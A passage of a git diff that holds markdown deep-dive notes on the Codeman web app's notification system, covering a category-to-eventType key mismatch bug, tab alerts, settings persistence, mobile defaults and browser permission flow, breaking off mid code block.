### Category-to-EventType Mapping Gap
|
||||
|
||||
**Bug identified**: The notification categories used in `notify()` calls do NOT always match the event type keys in `preferences.eventTypes`. For example:
|
||||
|
||||
- Category `session-error` is used (line 2343) but the eventType key is `session_error` (underscore, line 902)
|
||||
- Category `session-crash` (line 2362) has no corresponding eventType entry
|
||||
- Category `session-stuck` (line 2388) has no corresponding eventType entry
|
||||
- Category `respawn-blocked` (line 2490) has no corresponding eventType entry
|
||||
- Category `auto-accept` (line 2515) has no corresponding eventType entry
|
||||
- Category `auto-clear` (line 2625) has no corresponding eventType entry
|
||||
- Category `circuit-breaker` (lines 2774, 10636) has no corresponding eventType entry
|
||||
- Category `exit-gate` (line 2789) has no corresponding eventType entry
|
||||
- Category `hook-idle` (line 2825) -- should map to `idle_prompt`, but it does not match the key
|
||||
- Category `hook-permission` (line 2843) -- should map to `permission_prompt`, but does not match
|
||||
- Category `hook-elicitation` (line 2860) -- should map to `elicitation_dialog`, but does not match
|
||||
- Category `hook-stop` (line 2877) -- should map to `stop`, but does not match
|
||||
- Category `fix-plan` (lines 10659, 10721, etc.) has no corresponding eventType entry
|
||||
|
||||
**Impact**: When `notify()` is called with a category that does not exist in `preferences.eventTypes`, the code falls through to the legacy urgency-based muting path (lines 976-983). This means per-event-type browser/audio toggles in the settings UI have **no effect** on the actual hook events, because the hook events use different category strings (`hook-permission`) than the eventType keys (`permission_prompt`).
|
||||
|
||||
For example, unchecking "Browser" for "Permission prompts" in settings sets `eventTypes.permission_prompt.browser = false`. But the actual notification uses category `hook-permission`, which is not found in eventTypes, so it falls back to urgency-based logic where `critical` urgency always gets browser notifications when `browserNotifications` is enabled.
|
||||
|
||||
**This is the most significant bug in the notification system.**
|
||||
|
||||
---
|
||||
|
||||
## 9. Tab Alert System (Separate from NotificationManager)
|
||||
|
||||
### How It Works
|
||||
|
||||
Tab alerts are a separate visual indicator system that shows blinking session tabs:
|
||||
|
||||
1. **State tracking** (lines 1349-1354):
|
||||
- `tabAlerts: Map<sessionId, 'action' | 'idle'>` -- current alert state per tab
|
||||
- `pendingHooks: Map<sessionId, Set<hookType>>` -- pending hook events
|
||||
|
||||
2. **setPendingHook()** (lines 1445-1451): Adds hook type to session's pending set, calls `updateTabAlertFromHooks()`.
|
||||
|
||||
3. **clearPendingHooks()** (lines 1453-1464): Removes specific hook type or all hooks, calls `updateTabAlertFromHooks()`.
|
||||
|
||||
4. **updateTabAlertFromHooks()** (lines 1467-1477):
|
||||
```
|
||||
No hooks -> remove alert
|
||||
Has permission_prompt OR elicitation_dialog -> 'action' alert (red blink)
|
||||
Has idle_prompt -> 'idle' alert (yellow blink)
|
||||
```
|
||||
|
||||
5. **Visual rendering** (lines 3497-3504, 3581-3582):
|
||||
Tab elements get CSS classes `tab-alert-action` or `tab-alert-idle`.
|
||||
|
||||
### CSS Animations (styles.css lines 329-345)
|
||||
|
||||
```css
|
||||
.session-tab.tab-alert-action {
|
||||
animation: tab-blink-red 2.5s ease-in-out infinite;
|
||||
}
|
||||
.session-tab.tab-alert-idle {
|
||||
animation: tab-blink-yellow 3.5s ease-in-out infinite;
|
||||
}
|
||||
@keyframes tab-blink-red {
|
||||
0%, 100% { background: transparent; border-color: transparent; }
|
||||
50% { background: rgba(239, 68, 68, 0.12); border-color: var(--red); }
|
||||
}
|
||||
@keyframes tab-blink-yellow {
|
||||
0%, 100% { background: transparent; border-color: transparent; }
|
||||
50% { background: rgba(234, 179, 8, 0.1); border-color: var(--yellow); }
|
||||
}
|
||||
```
|
||||
|
||||
### Alert Clearing
|
||||
|
||||
- **`session:working` event** (line 2406-2408): Clears tab alert **only if no pending hooks** remain for that session. This correctly preserves alerts for permission prompts even when Claude starts working again.
|
||||
- **`hook:stop` event** (line 2873): Clears ALL pending hooks for the session (response complete means all hooks resolved).
|
||||
- **`selectSession()`** (line 3977): Clears `idle_prompt` hooks (viewing the session means you saw the idle state) but keeps `action` hooks.
|
||||
- **`sendInput()`** (line 3148): Clears all pending hooks (user sent input, so hooks are resolved).
|
||||
- **Session deletion** (line 4128-4129): Clears both pending hooks and tab alerts.
|
||||
- **SSE reconnect** (lines 3287-3289): Clears all pending hooks and tab alerts.
|
||||
|
||||
### Tab Glow Effect (lines 3983-3986)
|
||||
|
||||
When switching sessions, the newly-active tab gets a brief green glow animation:
|
||||
```css
|
||||
@keyframes tab-glow {
|
||||
0% { box-shadow: none; }
|
||||
10% { box-shadow: 0 0 18px 6px rgba(34, 197, 94, 0.7); }
|
||||
100% { box-shadow: none; }
|
||||
}
|
||||
```
|
||||
This is purely cosmetic and not notification-related.
|
||||
|
||||
---
|
||||
|
||||
## 10. Notification Settings UI (lines 9272-9461)
|
||||
|
||||
### Settings Location
|
||||
|
||||
Under App Settings modal -> "Notifications" tab (if using tabbed settings layout).
|
||||
|
||||
### Controls
|
||||
|
||||
**Global Controls** (index.html lines 981-1013):
|
||||
| Setting | Element ID | Default | Purpose |
|
||||
|---------|-----------|---------|---------|
|
||||
| Enabled | `appSettingsNotifEnabled` | true (desktop), false (mobile) | Master switch |
|
||||
| Browser | `appSettingsNotifBrowser` | true (desktop), false (mobile) | OS-level notifications |
|
||||
| Audio Alerts | `appSettingsNotifAudio` | false | Beep sounds |
|
||||
| Idle Threshold | `appSettingsNotifStuckMins` | 10 | Minutes before "stuck" warning |
|
||||
|
||||
**Legacy Urgency Levels** (index.html lines 1019-1039):
|
||||
| Setting | Element ID | Default | Purpose |
|
||||
|---------|-----------|---------|---------|
|
||||
| Critical | `appSettingsNotifCritical` | checked | Show critical urgency |
|
||||
| Warning | `appSettingsNotifWarning` | checked | Show warning urgency |
|
||||
| Info | `appSettingsNotifInfo` | checked | Show info urgency |
|
||||
|
||||
These are stored inverted as `muteCritical`, `muteWarning`, `muteInfo`.
|
||||
|
||||
**Per-Event-Type Grid** (index.html lines 1046-1086):
|
||||
A 4-column grid (Event / On / Browser / Sound) for 7 event types:
|
||||
|
||||
| Event | On Default | Browser Default | Sound Default |
|
||||
|-------|-----------|-----------------|---------------|
|
||||
| Permission prompts | on | on | on |
|
||||
| Questions from Claude | on | on | on |
|
||||
| Session idle | on | on | off |
|
||||
| Response complete | on | off | off |
|
||||
| Respawn cycles | on | off | off |
|
||||
| Task complete | on | on | on |
|
||||
| Subagent activity | off | off | off |
|
||||
|
||||
### Save Flow (lines 9362-9488)
|
||||
|
||||
1. Collect all UI values into a `notifPrefsToSave` object
|
||||
2. Set `this.notificationManager.preferences = notifPrefsToSave`
|
||||
3. Call `this.notificationManager.savePreferences()` (writes to localStorage)
|
||||
4. Send to server via `PUT /api/settings` with `notificationPreferences` field
|
||||
5. Call `applyHeaderVisibilitySettings()` which hides/shows the bell button
|
||||
|
||||
### Session Error Event Type Bug (line 9425-9429)
|
||||
|
||||
The `session_error` event type in the save flow reuses the `permission_prompt`'s browser checkbox:
|
||||
```js
|
||||
session_error: {
|
||||
enabled: true,
|
||||
browser: document.getElementById('eventPermissionBrowser').checked, // BUG: wrong checkbox
|
||||
audio: false,
|
||||
},
|
||||
```
|
||||
This means toggling "Permission prompts -> Browser" also affects `session_error` browser notifications, which is likely unintentional.
|
||||
|
||||
---
|
||||
|
||||
## 11. Mobile-Specific Behavior
|
||||
|
||||
### Device Detection (lines 119-198)
|
||||
|
||||
`MobileDetection` object detects:
|
||||
- Touch capability (via `ontouchstart`, `maxTouchPoints`, media query)
|
||||
- iOS devices
|
||||
- Safari browser
|
||||
- Screen size categories: mobile (<430px), tablet (430-768px), desktop (768px+)
|
||||
|
||||
Body classes set: `device-mobile`, `device-tablet`, `device-desktop`, `touch-device`, `ios-device`, `safari-browser`.
|
||||
|
||||
### Mobile Notification Defaults (lines 910-914)
|
||||
|
||||
On mobile devices:
|
||||
- `enabled: false` -- notifications disabled by default
|
||||
- `browserNotifications: false` -- browser notifications disabled
|
||||
- `audioAlerts: false` -- audio disabled (same as desktop)
|
||||
|
||||
### Mobile Storage Key (lines 952-956)
|
||||
|
||||
Mobile uses a separate localStorage key (`codeman-notification-prefs-mobile`) so that enabling notifications on desktop does not accidentally enable them on a mobile device viewing the same Codeman instance.
|
||||
|
||||
### Mobile Drawer Styling (mobile.css lines 1049-1058)
|
||||
|
||||
```css
|
||||
.notification-drawer {
|
||||
width: 100%;
|
||||
max-width: 100%;
|
||||
right: 0;
|
||||
border-radius: 0;
|
||||
padding-left: var(--safe-area-left);
|
||||
padding-right: var(--safe-area-right);
|
||||
padding-bottom: var(--safe-area-bottom);
|
||||
}
|
||||
```
|
||||
|
||||
The drawer takes full width on mobile and respects iOS safe areas (notch, home indicator).
|
||||
|
||||
### Mobile Tab Ordering (lines 3566-3568)
|
||||
|
||||
On mobile, the active session tab is always rendered first:
|
||||
```js
|
||||
if (MobileDetection.getDeviceType() === 'mobile' && this.activeSessionId) {
|
||||
tabOrder = [this.activeSessionId, ...this.sessionOrder.filter(id => id !== this.activeSessionId)];
|
||||
}
|
||||
```
|
||||
|
||||
This ensures the active tab's alert animation is always visible.
|
||||
|
||||
---
|
||||
|
||||
## 12. Team/Agent Notifications
|
||||
|
||||
### Subagent Event Handling
|
||||
|
||||
Subagent events (`subagent:discovered`, `subagent:updated`, etc.) do NOT directly call `notificationManager.notify()`. There are no direct notification calls for subagent spawn/complete events in the SSE handlers.
|
||||
|
||||
The `subagent_spawn` and `subagent_complete` event types exist in the preferences (lines 906-907) and settings UI, but no code currently dispatches notifications with these categories.
|
||||
|
||||
### Teammate Badges (lines 13063-13095)
|
||||
|
||||
Teammate badges are purely visual UI elements on subagent windows -- they are not part of the notification system. They show `@name` with team color (blue, green, yellow).
|
||||
|
||||
### Missing Subagent Notifications
|
||||
|
||||
Despite having settings for "Subagent activity" (on/browser/sound), the system **never dispatches** notifications with category `subagent_spawn` or `subagent_complete`. The UI settings exist but are non-functional for these event types.
|
||||
|
||||
---
|
||||
|
||||
## 13. Visual Indicators Summary
|
||||
|
||||
### Notification-Related
|
||||
|
||||
| Indicator | Element | Behavior |
|
||||
|-----------|---------|----------|
|
||||
| Bell badge | `#notifBadge` | Red circle with count, pulsing animation |
|
||||
| Tab blink (action) | `.tab-alert-action` | Red blink, 2.5s cycle |
|
||||
| Tab blink (idle) | `.tab-alert-idle` | Yellow blink, 3.5s cycle |
|
||||
| Title flash | `document.title` | Alternates with unread count, 1.5s interval |
|
||||
| Drawer slide-in | `.notification-drawer.open` | Right-to-left slide, 0.2s |
|
||||
| Item slide-in | `.notif-item` | Right-to-left slide, 0.2s |
|
||||
| Item urgency border | `.notif-item-critical/warning/info` | Red/yellow/blue left border |
|
||||
| Unread highlight | `.notif-item.unread` | Subtle blue background |
|
||||
|
||||
### Non-Notification Visual Indicators
|
||||
|
||||
| Indicator | Element | Purpose |
|
||||
|-----------|---------|---------|
|
||||
| Tab status dot | `.tab-status` | Green (idle), pulsing green (busy), red (error) |
|
||||
| Tab glow | `.tab-glow` | Brief green glow on tab switch |
|
||||
| Connection indicator | `#connectionIndicator` | Shows offline/reconnecting/draining state |
|
||||
| Ralph status badge | `#ralphStatusBadge` | Active/completed/tracking state |
|
||||
| Subagent count badge | `#subagentCountBadge` | Active agent count |
|
||||
| Task badge | `.tab-badge` | Running task count on session tab |
|
||||
|
||||
---
|
||||
|
||||
## 14. Bugs and Issues
|
||||
|
||||
### 14.1 Category/EventType Mismatch (CRITICAL)
|
||||
|
||||
**Location**: Lines 962-984 (notify flow) vs lines 897-908 (eventTypes definition)
|
||||
|
||||
The categories used in `notify()` calls (`hook-permission`, `hook-idle`, `session-error`, etc.) do not match the eventType keys in preferences (`permission_prompt`, `idle_prompt`, `session_error`, etc.). This means the per-event-type checkboxes in settings have no effect on most notifications.
|
||||
|
||||
**Impact**: Users who disable "Permission prompts -> Browser" in settings still get browser notifications for permission prompts, because the notification uses category `hook-permission` which falls through to urgency-based logic.
|
||||
|
||||
**Fix**: Either change the categories in `notify()` calls to match the eventType keys, or add a mapping layer in `notify()`.
|
||||
|
||||
### 14.2 Session Error Browser Setting Reuse (MINOR)
|
||||
|
||||
**Location**: Line 9427
|
||||
|
||||
`session_error.browser` reuses `eventPermissionBrowser` checkbox instead of having its own control.
|
||||
|
||||
### 14.3 No Subagent Notifications Dispatched (MINOR)
|
||||
|
||||
**Location**: Event types `subagent_spawn` and `subagent_complete` exist in defaults (lines 906-907) and UI (lines 1082-1085), but no code ever calls `notify()` with these categories.
|
||||
|
||||
### 14.4 AudioContext Autoplay Policy (MINOR)
|
||||
|
||||
**Location**: Line 1167
|
||||
|
||||
`AudioContext` creation may be blocked by browser autoplay policy. No `resume()` call is made. First audio alert after page load may silently fail.
|
||||
|
||||
### 14.5 Rate Limit Applies Across All Events (MINOR)
|
||||
|
||||
**Location**: Line 1124
|
||||
|
||||
The 3-second rate limit for browser notifications is global -- a rapid succession of different event types (e.g., permission prompt + session error) will only show the first browser notification.
|
||||
|
||||
### 14.6 Title Flash Shows Emoji That May Not Gate Properly
|
||||
|
||||
**Location**: Line 1088
|
||||
|
||||
Title flash always shows when tab is hidden and there are unread notifications, regardless of which event types are enabled/disabled. If a user disables all event types but one, the title flash still fires for all unread items.
|
||||
|
||||
This is correct behavior (the flash indicates unread items in the drawer), but it could be confusing if a user thinks disabling an event type should prevent all visual indicators.
|
||||
|
||||
### 14.7 onTabVisible Marks All Read If Drawer Open
|
||||
|
||||
**Location**: Lines 1243-1246
|
||||
|
||||
When the tab becomes visible and the drawer is open, ALL notifications are marked as read. This could be surprising if the user quickly switches tabs and back -- they lose their unread state.
|
||||
|
||||
---
|
||||
|
||||
## 15. Cleanup and Memory Safety
|
||||
|
||||
### SSE Reconnect Cleanup (lines 3280-3305)
|
||||
|
||||
On `handleInit()` (SSE reconnect), the following notification state is cleaned up:
|
||||
- `pendingHooks.clear()` -- prevents stale hook alerts
|
||||
- `tabAlerts.clear()` -- prevents stale tab blinking
|
||||
- `_shownCompletions.clear()` -- allows re-notification
|
||||
- `titleFlashInterval` cleared -- prevents orphaned intervals
|
||||
- `groupingMap` timeouts cleared -- prevents orphaned timeouts
|
||||
|
||||
### Session Deletion Cleanup (lines 4128-4129)
|
||||
|
||||
When a session is deleted:
|
||||
- `pendingHooks.delete(sessionId)`
|
||||
- `tabAlerts.delete(sessionId)`
|
||||
|
||||
### Idle Timer Cleanup (lines 2412-2417)
|
||||
|
||||
When session starts working, its stuck detection timer is cleared:
|
||||
```js
|
||||
const timer = this.idleTimers.get(data.id);
|
||||
if (timer) {
|
||||
clearTimeout(timer);
|
||||
this.idleTimers.delete(data.id);
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 16. Constants Reference
|
||||
|
||||
| Constant | Value | Purpose |
|
||||
|----------|-------|---------|
|
||||
| `GROUPING_TIMEOUT_MS` | 5000 | Notification grouping window |
|
||||
| `NOTIFICATION_LIST_CAP` | 100 | Max notifications in drawer |
|
||||
| `TITLE_FLASH_INTERVAL_MS` | 1500 | Title blink rate |
|
||||
| `BROWSER_NOTIF_RATE_LIMIT_MS` | 3000 | Min time between browser notifications |
|
||||
| `AUTO_CLOSE_NOTIFICATION_MS` | 8000 | Browser notification auto-dismiss |
|
||||
| `STUCK_THRESHOLD_DEFAULT_MS` | 600000 | Default idle-stuck detection (10 min) |
|
||||
| `THROTTLE_DELAY_MS` | 100 | General UI throttle |
|
||||
@@ -1,459 +0,0 @@
|
||||
# Notification Settings & Configuration System - Deep Dive
|
||||
|
||||
## 1. Settings UI
|
||||
|
||||
The notification settings live in the **App Settings modal** under the "Notifications" tab. The modal is opened via `openAppSettings()` at line 9234 of `src/web/public/app.js`, and the HTML structure is in `src/web/public/index.html` starting at line 974.
|
||||
|
||||
### Settings Tab Layout (5 tabs total)
|
||||
|
||||
The App Settings modal has tabs: Display, Claude CLI, Models, Paths, **Notifications**. The Notifications tab contains:
|
||||
|
||||
#### Master Control Section
|
||||
| Setting | Element ID | Type | Default (Desktop) | Default (Mobile) |
|
||||
|---------|-----------|------|-------------------|-------------------|
|
||||
| Enable Notifications | `appSettingsNotifEnabled` | checkbox | `true` | `false` |
|
||||
| Browser Notifications | `appSettingsNotifBrowser` | checkbox | `true` | `false` |
|
||||
| Browser Permission | `notifPermissionStatus` | status badge | shows checkmark/X/? | same |
|
||||
|
||||
The Browser row includes an "Ask" button that calls `requestPermission()` and a status badge showing the current `Notification.permission` state.
|
||||
|
||||
There is also a hint: _"For remote access, HTTPS is required. Start with: `codeman web --https`"_
|
||||
|
||||
#### Alerts Section
|
||||
| Setting | Element ID | Type | Default |
|
||||
|---------|-----------|------|---------|
|
||||
| Audio Alerts | `appSettingsNotifAudio` | checkbox | `false` |
|
||||
| Idle Threshold | `appSettingsNotifStuckMins` | number input (1-120) | `10` minutes |
|
||||
|
||||
#### Notification Levels Section (3-column grid)
|
||||
| Level | Element ID | Default |
|
||||
|-------|-----------|---------|
|
||||
| Critical | `appSettingsNotifCritical` | checked |
|
||||
| Warning | `appSettingsNotifWarning` | checked |
|
||||
| Info | `appSettingsNotifInfo` | checked |
|
||||
|
||||
These map to legacy `muteCritical`/`muteWarning`/`muteInfo` boolean fields (inverted: checked = not muted).
|
||||
|
||||
#### Per-Event Settings (4-column grid: Event / On / Browser / Sound)
|
||||
| Event | Enabled | Browser | Audio |
|
||||
|-------|---------|---------|-------|
|
||||
| Permission prompts | `eventPermissionEnabled` (default: on) | `eventPermissionBrowser` (on) | `eventPermissionAudio` (on) |
|
||||
| Questions from Claude | `eventQuestionEnabled` (on) | `eventQuestionBrowser` (on) | `eventQuestionAudio` (on) |
|
||||
| Session idle | `eventIdleEnabled` (on) | `eventIdleBrowser` (on) | `eventIdleAudio` (off) |
|
||||
| Response complete | `eventStopEnabled` (on) | `eventStopBrowser` (off) | `eventStopAudio` (off) |
|
||||
| Respawn cycles | `eventRespawnEnabled` (on) | `eventRespawnBrowser` (off) | `eventRespawnAudio` (off) |
|
||||
| Task complete | `eventRalphEnabled` (on) | `eventRalphBrowser` (on) | `eventRalphAudio` (on) |
|
||||
| Subagent activity | `eventSubagentEnabled` (off) | `eventSubagentBrowser` (off) | `eventSubagentAudio` (off) |
|
||||
|
||||
|
||||
## 2. Settings Persistence
|
||||
|
||||
### Dual-layer persistence: localStorage + Server
|
||||
|
||||
Notification preferences are stored in **two places simultaneously**:
|
||||
|
||||
#### Layer 1: localStorage (primary, device-specific)
|
||||
|
||||
- **Storage key**: `codeman-notification-prefs` (desktop) or `codeman-notification-prefs-mobile` (mobile)
|
||||
- Determined by `NotificationManager.getStorageKey()` at line 953, which calls `MobileDetection.getDeviceType()`
|
||||
- Device type is based on `window.innerWidth`: `<430` = mobile, `430-768` = tablet, `>=768` = desktop
|
||||
- Read in `loadPreferences()` (line 896), written in `savePreferences()` (line 958)
|
||||
|
||||
#### Layer 2: Server-side (`~/.codeman/settings.json`)
|
||||
|
||||
- On save, notification prefs are bundled with app settings: `{ ...settings, notificationPreferences: notifPrefsToSave }` (line 9475)
|
||||
- Sent via `PUT /api/settings` to the Fastify server
|
||||
- Server does a shallow merge: `const merged = { ...existing, ...settings }` then writes to `~/.codeman/settings.json` (line 3098 of server.ts)
|
||||
- The `notificationPreferences` key sits at the top level of the settings JSON alongside app settings
|
||||
|
||||
#### Load priority
|
||||
|
||||
On startup, `loadAppSettingsFromServer()` (line 9787) fetches from server and:
|
||||
1. Extracts `notificationPreferences` from the response (line 9793)
|
||||
2. Only applies server notification prefs **if localStorage has none** (line 9816): `if (!localNotifPrefs)`
|
||||
3. This means **localStorage always wins** over server for notification prefs, making the server copy essentially a backup for new devices
|
||||
|
||||
### Preferences schema (version 3)
|
||||
|
||||
```javascript
|
||||
{
|
||||
enabled: true, // Master toggle
|
||||
browserNotifications: true, // Browser Notification API toggle
|
||||
audioAlerts: false, // Web Audio API toggle
|
||||
stuckThresholdMs: 600000, // 10 minutes default
|
||||
muteCritical: false, // Legacy urgency muting
|
||||
muteWarning: false,
|
||||
muteInfo: false,
|
||||
eventTypes: { // Per-event-type prefs (added in v3)
|
||||
permission_prompt: { enabled: true, browser: true, audio: true },
|
||||
elicitation_dialog: { enabled: true, browser: true, audio: true },
|
||||
idle_prompt: { enabled: true, browser: true, audio: false },
|
||||
stop: { enabled: true, browser: false, audio: false },
|
||||
session_error: { enabled: true, browser: true, audio: false },
|
||||
respawn_cycle: { enabled: true, browser: false, audio: false },
|
||||
token_milestone: { enabled: true, browser: false, audio: false },
|
||||
ralph_complete: { enabled: true, browser: true, audio: true },
|
||||
subagent_spawn: { enabled: false, browser: false, audio: false },
|
||||
subagent_complete: { enabled: false, browser: false, audio: false },
|
||||
},
|
||||
_version: 3,
|
||||
}
|
||||
```
|
||||
|
||||
### Migration path
|
||||
|
||||
- **v1 -> v2**: `browserNotifications` was changed from defaulting `false` to `true` (line 932)
|
||||
- **v2 -> v3**: Added `eventTypes` object (line 937)
|
||||
- Migration happens on load and writes back to localStorage immediately
|
||||
|
||||
### App settings (separate from notification prefs)
|
||||
|
||||
App settings use a different device-specific localStorage key:
|
||||
- Desktop: `codeman-app-settings`
|
||||
- Mobile: `codeman-app-settings-mobile`
|
||||
- Determined by `getSettingsStorageKey()` at line 9562
|
||||
|
||||
|
||||
## 3. Settings Application - How Toggles Take Effect
|
||||
|
||||
### The `notify()` method decision tree (line 962)
|
||||
|
||||
When `notify()` is called:
|
||||
|
||||
1. **Master check**: If `!preferences.enabled`, return immediately (no notification at all)
|
||||
2. **Event type lookup**: Look up `preferences.eventTypes[category]`
|
||||
3. **If event type found**:
|
||||
- If `!eventPref.enabled`, return (event type disabled)
|
||||
- `shouldBrowserNotify = eventPref.browser && preferences.browserNotifications`
|
||||
- `shouldAudioAlert = eventPref.audio && preferences.audioAlerts`
|
||||
4. **If event type NOT found** (fallback for unknown categories):
|
||||
- Check legacy `muteCritical`/`muteWarning`/`muteInfo` based on urgency
|
||||
- `shouldBrowserNotify` = global browser toggle AND (critical/warning OR tab hidden)
|
||||
- `shouldAudioAlert` = critical urgency AND global audio toggle
|
||||
|
||||
### CRITICAL BUG: Category Key Mismatch
|
||||
|
||||
The `eventTypes` keys in the preferences schema do NOT match the `category` values used in actual `notify()` calls. This means **per-event-type settings have no effect for most notification categories**:
|
||||
|
||||
| eventTypes Key | Actual category Used in notify() | Match? |
|
||||
|---------------|----------------------------------|--------|
|
||||
| `permission_prompt` | `hook-permission` | NO |
|
||||
| `elicitation_dialog` | `hook-elicitation` | NO |
|
||||
| `idle_prompt` | `hook-idle` | NO |
|
||||
| `stop` | `hook-stop` | NO |
|
||||
| `session_error` | `session-error` | NO |
|
||||
| `respawn_cycle` | `respawn-blocked` | NO |
|
||||
| `token_milestone` | (not used anywhere) | N/A |
|
||||
| `ralph_complete` | `ralph-complete` | NO |
|
||||
| `subagent_spawn` | (used in subagent code) | Needs verification |
|
||||
| `subagent_complete` | (used in subagent code) | Needs verification |
|
||||
|
||||
**Impact**: When `notify()` receives `category: 'hook-permission'`, it looks up `eventTypes['hook-permission']`, finds nothing, and falls through to the legacy urgency-based logic. The per-event toggles in the settings UI are effectively non-functional for all hook-based and most other notifications.
|
||||
|
||||
The only categories that have a chance of matching are those used in subagent notification code, which would need separate verification.
|
||||
|
||||
Additional uncategorized notifications that always fall through to urgency-based logic:
|
||||
- `session-crash`
|
||||
- `session-stuck`
|
||||
- `auto-accept`
|
||||
- `auto-clear`
|
||||
- `circuit-breaker`
|
||||
- `exit-gate`
|
||||
- `fix-plan`
|
||||
|
||||
### Settings application timing
|
||||
|
||||
Settings changes take effect immediately because:
|
||||
1. `saveAppSettings()` sets `this.notificationManager.preferences = notifPrefsToSave` directly (line 9459)
|
||||
2. Calls `savePreferences()` to persist to localStorage (line 9460)
|
||||
3. Calls `applyHeaderVisibilitySettings()` which hides/shows the notification bell icon (line 9647-9657)
|
||||
|
||||
### Bell icon visibility
|
||||
|
||||
The notification bell icon in the header (`btn-notifications`) is hidden when `preferences.enabled` is `false` (line 9649-9651). If notifications are disabled while the drawer is open, the drawer is force-closed (line 9654-9657).
|
||||
|
||||
|
||||
## 4. Default Values
|
||||
|
||||
### Desktop defaults
|
||||
| Setting | Default | Source |
|
||||
|---------|---------|--------|
|
||||
| enabled | `true` | `loadPreferences()` line 913 |
|
||||
| browserNotifications | `true` | line 914, negated `isMobile` |
|
||||
| audioAlerts | `false` | line 915 |
|
||||
| stuckThresholdMs | `600000` (10 min) | `STUCK_THRESHOLD_DEFAULT_MS` constant, line 11 |
|
||||
| muteCritical/Warning/Info | `false` (not muted) | lines 918-920 |
|
||||
|
||||
### Mobile defaults
|
||||
| Setting | Default | Source |
|
||||
|---------|---------|--------|
|
||||
| enabled | `false` | line 913, negated `!isMobile` |
|
||||
| browserNotifications | `false` | line 914 |
|
||||
| audioAlerts | `false` | line 915 |
|
||||
|
||||
### CLAUDE.md documentation
|
||||
|
||||
CLAUDE.md states: _"Key defaults: Most panels hidden (monitor, subagents shown), notifications enabled (audio disabled), subagent tracking on, Ralph tracking off."_
|
||||
|
||||
This is accurate for desktop but does not mention the mobile-specific defaults where notifications are entirely disabled.
|
||||
|
||||
### Constants (line 11-16 of app.js)
|
||||
```javascript
|
||||
const STUCK_THRESHOLD_DEFAULT_MS = 600000; // 10 minutes
|
||||
const GROUPING_TIMEOUT_MS = 5000; // 5 seconds - notification grouping window
|
||||
const NOTIFICATION_LIST_CAP = 100; // Max notifications in list
|
||||
const TITLE_FLASH_INTERVAL_MS = 1500; // Title flash rate
|
||||
const BROWSER_NOTIF_RATE_LIMIT_MS = 3000; // Rate limit for browser notifications
|
||||
const AUTO_CLOSE_NOTIFICATION_MS = 8000; // Auto-close browser notifications
|
||||
```
|
||||
|
||||
|
||||
## 5. Desktop vs Mobile Settings
|
||||
|
||||
### Separate storage keys - YES
|
||||
|
||||
Desktop and mobile use completely separate localStorage keys:
|
||||
- **Notification prefs**: `codeman-notification-prefs` vs `codeman-notification-prefs-mobile`
|
||||
- **App settings**: `codeman-app-settings` vs `codeman-app-settings-mobile`
|
||||
|
||||
### Different defaults - YES
|
||||
|
||||
Mobile defaults disable everything:
|
||||
- `enabled: false` (master toggle off)
|
||||
- `browserNotifications: false`
|
||||
- All tracking features disabled
|
||||
- All panels hidden
|
||||
|
||||
Desktop defaults enable notifications but keep audio off.
|
||||
|
||||
### Server-side sync behavior
|
||||
|
||||
When loading from server, display settings (which include panel visibility, tracking toggles, etc.) are filtered out to avoid overwriting mobile-specific defaults (lines 9796-9806). Notification prefs from the server only apply if the device has no local prefs yet (line 9816).
|
||||
|
||||
### Mobile CSS adjustments
|
||||
|
||||
`mobile.css` line 1050 makes the notification drawer full-width on mobile:
|
||||
```css
|
||||
.notification-drawer {
|
||||
width: 100%;
|
||||
max-width: 100%;
|
||||
right: 0;
|
||||
border-radius: 0;
|
||||
padding-left: var(--safe-area-left);
|
||||
padding-right: var(--safe-area-right);
|
||||
padding-bottom: var(--safe-area-bottom);
|
||||
}
|
||||
```
|
||||
|
||||
### Device type detection
|
||||
|
||||
`MobileDetection.getDeviceType()` (line 153) uses a simple width check:
|
||||
- `< 430px` = mobile
|
||||
- `430-768px` = tablet (treated as desktop for settings keys)
|
||||
- `>= 768px` = desktop
|
||||
|
||||
Note: Only `mobile` vs non-mobile matters for settings keys. Tablet uses the desktop key.
|
||||
|
||||
|
||||
## 6. Notification Permission Flow
|
||||
|
||||
### Auto-request on first notification
|
||||
|
||||
When `sendBrowserNotif()` is called and `Notification.permission === 'default'` (never asked), the app **auto-requests permission** (line 1110-1118):
|
||||
```javascript
|
||||
if (Notification.permission === 'default') {
|
||||
Notification.requestPermission().then(result => {
|
||||
if (result === 'granted') {
|
||||
this.sendBrowserNotif(title, body, tag, sessionId); // Re-send
|
||||
}
|
||||
});
|
||||
return;
|
||||
}
|
||||
```
|
||||
|
||||
The first notification that would trigger a browser notification causes the permission prompt. If granted, the notification is re-sent.
|
||||
|
||||
### Manual request via settings
|
||||
|
||||
The "Ask" button in the Notifications settings tab calls `requestPermission()` (line 1146):
|
||||
```javascript
|
||||
async requestPermission() {
|
||||
if (typeof Notification === 'undefined') {
|
||||
this.app.showToast('Browser notifications not supported', 'warning');
|
||||
return;
|
||||
}
|
||||
const result = await Notification.requestPermission();
|
||||
// Update status badge
|
||||
if (result === 'granted') {
|
||||
this.preferences.browserNotifications = true;
|
||||
this.savePreferences();
|
||||
this.app.showToast('Notifications enabled', 'success');
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**Side effect**: Granting permission also auto-enables `browserNotifications` toggle (line 1155).
|
||||
|
||||
### Permission status display
|
||||
|
||||
The settings UI shows the current permission state via a status badge:
|
||||
- Checkmark (granted) - green background
|
||||
- X (denied) - red background
|
||||
- ? (default/not asked) - neutral
|
||||
|
||||
### HTTPS requirement
|
||||
|
||||
Browser notifications require HTTPS for remote access. The settings UI includes a hint: _"For remote access, HTTPS is required. Start with: `codeman web --https`"_. On localhost, HTTP works fine.
|
||||
|
||||
|
||||
## 7. Audio Setting
|
||||
|
||||
### Toggle: `audioAlerts`
|
||||
|
||||
The global `audioAlerts` toggle (default: `false`) controls whether audio can play at all. Per-event `audio` toggles further refine which events produce sound.
|
||||
|
||||
### Audio generation
|
||||
|
||||
Audio is generated via the Web Audio API (line 1163-1181), NOT via audio file playback:
|
||||
```javascript
|
||||
playAudioAlert() {
|
||||
const ctx = new AudioContext();
|
||||
const oscillator = ctx.createOscillator();
|
||||
const gain = ctx.createGain();
|
||||
oscillator.type = 'sine';
|
||||
oscillator.frequency.setValueAtTime(660, ctx.currentTime); // 660 Hz (E5)
|
||||
gain.gain.setValueAtTime(0.15, ctx.currentTime); // Low volume
|
||||
gain.gain.exponentialRampToValueAtTime(0.01, ctx.currentTime + 0.15); // 150ms fade
|
||||
oscillator.start(ctx.currentTime);
|
